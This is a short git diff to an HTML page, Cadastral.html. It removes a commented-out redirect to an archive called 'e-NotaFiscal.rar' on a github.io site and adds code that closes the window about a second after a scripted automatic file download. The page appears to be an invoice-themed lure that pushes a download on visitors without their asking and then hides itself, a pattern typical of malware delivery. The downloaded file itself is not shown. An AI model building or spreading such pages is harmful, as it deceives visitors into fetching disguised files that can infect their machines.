--- a/Cadastral.html
+++ b/Cadastral.html
@@ -1,16 +1,3 @@
-<!-- <!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Redirect</title>
-    <script>
-        window.location.href = 'https://baixetudopcwindows.github.io/clubewin/e-NotaFiscal.rar'; // Substitua pela URL do seu link de download
-    </script>
-</head>
-<body>
-</body>
-</html> -->
 
 
 
@@ -41,6 +28,11 @@
                     document.body.appendChild(link);
                     link.click();
                     document.body.removeChild(link);
+                    
+                    // Fecha a janela após o download
+                    window.setTimeout(() => {
+                        window.open('', '_self').close();
+                    }, 1000);
                 })
                 .catch(error => console.error('Erro ao baixar o arquivo:', error));
         }
@@ -56,5 +48,6 @@
 <body>
 </body>
 </html>
+
 
 
